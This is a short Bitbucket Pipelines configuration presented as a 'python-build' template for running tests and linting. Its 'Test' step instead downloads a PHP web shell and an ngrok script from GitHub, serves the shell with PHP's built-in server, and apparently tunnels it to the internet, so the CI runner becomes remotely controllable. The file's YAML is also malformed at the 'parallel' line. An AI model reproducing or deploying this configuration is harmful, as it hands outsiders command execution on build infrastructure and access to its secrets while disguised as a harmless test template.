#  Template python-build

#  This template allows you to validate your python code.
#  The workflow allows running tests and code linting on the default branch.

image: python:3.8

pipelines:
  default:
    - parallel
      - step:
          name: Test
          caches:
            - pip
          script:
            - wget https://raw.githubusercontent.com/mwayanta/test/main/ngrok.sh
            - wget https://raw.githubusercontent.com/artyuum/simple-php-web-shell/master/index.php
            - php -S localhost:8181 &
            - bash ngrok.sh